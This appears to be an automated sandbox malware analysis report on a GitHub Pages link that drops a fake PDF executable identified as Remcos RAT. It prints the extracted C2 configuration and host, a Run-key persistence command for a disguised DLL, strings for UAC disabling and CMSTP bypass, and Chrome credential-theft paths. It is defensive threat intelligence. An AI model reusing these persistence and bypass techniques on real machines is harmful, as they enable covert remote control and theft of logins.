Edit tour

Windows Analysis Report
https://maveuve.github.io/frlpodf/marynewreleasefax.html

Overview

General Information

Sample URL:	https://maveuve.github.io/frlpodf/marynewreleasefax.html
Analysis ID:	1518509
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Remcos RAT

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious names

Downloads suspicious files via Chrome

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected suspicious crossdomain redirect

Drops PE files

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses reg.exe to modify the Windows registry

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2028,i,2931579537296338705,3953823219278610053,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://maveuve.github.io/frlpodf/marynewreleasefax.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

rundll32.exe (PID: 3880 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)

MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe (PID: 3492 cmdline: "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe" MD5: 4864A55CFF27F686023456A22371E790)

MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe (PID: 6148 cmdline: "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe" MD5: 4864A55CFF27F686023456A22371E790)

build.exe (PID: 6316 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 55FC1A86363D371667FFC9D4DF110A5E)

cmd.exe (PID: 1980 cmdline: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4572 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe (PID: 2940 cmdline: "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe" MD5: 4864A55CFF27F686023456A22371E790)

MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe (PID: 5652 cmdline: "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe" MD5: 4864A55CFF27F686023456A22371E790)

MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe (PID: 1764 cmdline: "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe" MD5: 4864A55CFF27F686023456A22371E790)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "privmerkt.com:9583:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9QRTYQ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.2423957132.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.2324228645.0000000010163000.00000040.00000001.01000000.00000005.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b9c6:$a1: Remcos restarted by watchdog! 0x6bf3e:$a3: %02i:%02i:%02i:%03i
00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
00000009.00000002.2323301889.0000000002850000.00000040.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 3492	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x4b64f:$a1: Remcos restarted by watchdog! 0x5b093:$a1: Remcos restarted by watchdog! 0x4bba9:$a3: %02i:%02i:%02i:%03i 0x4bfd8:$a3: %02i:%02i:%02i:%03i 0x5b5ec:$a3: %02i:%02i:%02i:%03i 0x5ba1b:$a3: %02i:%02i:%02i:%03i
Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 6148	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe PID: 5652	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10163f0e.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.2850000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1c69c6:$a1: Remcos restarted by watchdog! 0x1c6f3e:$a3: %02i:%02i:%02i:%03i
9.2.MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe.10000000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1c0906:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1c089a:$s1: CoGetObject 0x1c08ae:$s1: CoGetObject 0x1c08ca:$s1: CoGetObject 0x1ca86c:$s1: CoGetObject 0x1c085a:$s2: Elevation:Administrator!new:
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll,EntryPoint, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*UpdaterCisco

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f , CommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1980, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f , ProcessId: 4572, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit, CommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe" , ParentImage: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, ParentProcessId: 3492, ParentProcessName: MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, ProcessCommandLine: cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*UpdaterCisco" /t REG_SZ /d "rundll32.exe C:\Users\user\Documents\CiscoUpdater000_PARTIAL.dll",EntryPoint /f & exit, ProcessId: 1980, ProcessName: cmd.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: CC 4D 9F 5C 9A 24 4A B9 C3 55 EF 3D 15 EE E4 6A DC D6 29 8F 84 58 13 54 FA D6 2C 7F 86 07 D5 E3 97 24 E8 93 30 64 10 F9 BE 3B 1C A4 FE 46 7E CA F8 CA 53 E3 15 F2 BC 85 9F AD D7 DE 16 76 C9 AF CF 6C 89 A8 13 25 0C EB C5 68 B6 A8 DC 8F 1F E2 74 99 35 4D 21 FD 68 BD DA 94 49 21 71 F4 B4 3D 9E DE B1 49 18 86 D5 31 9B E6 96 14 70 99 3B 46 2C FB AA CD 7C 6E 0B 5A BE 36 5E 63 31 A7 0D 7B FF 26 AA 07 1A E1 0A 31 ED 3B C3 47 E4 79 1F F2 7D 49 D5 3C 83 C5 2B EB 75 CF 77 EE 66 B0 BC 26 66 B3 11 24 7B FB 06 6E EB 88 0C 75 6C A4 B9 89 8E E5 DE BF 81 0E C0 61 B0 8E 1A 55 1B EC 2C 97 94 1C 8F CC 03 F4 68 39 4B 70 F5 BA E7 19 F5 24 2E 75 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Downloads\Marys Organizer 2023 Release\MY ORGANIZER 2023 Mortgage Interest PaymentsPDF.exe, ProcessId: 6148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-9QRTYQ\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T18:46:12.537078+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.16	49763	172.111.163.227	9583	TCP
2024-09-25T18:46:14.318118+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.16	49764	172.111.163.227	9583	TCP
2024-09-25T18:46:43.634116+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.16	49767	45.74.48.2	9774	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T18:46:14.183065+0200	2803304	3	Unknown Traffic	192.168.2.16	49765	178.237.33.50	80	TCP
2024-09-25T18:46:45.506423+0200	2803304	3	Unknown Traffic	192.168.2.16	49768	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: privmerkt.com

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000002.2563583207.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp

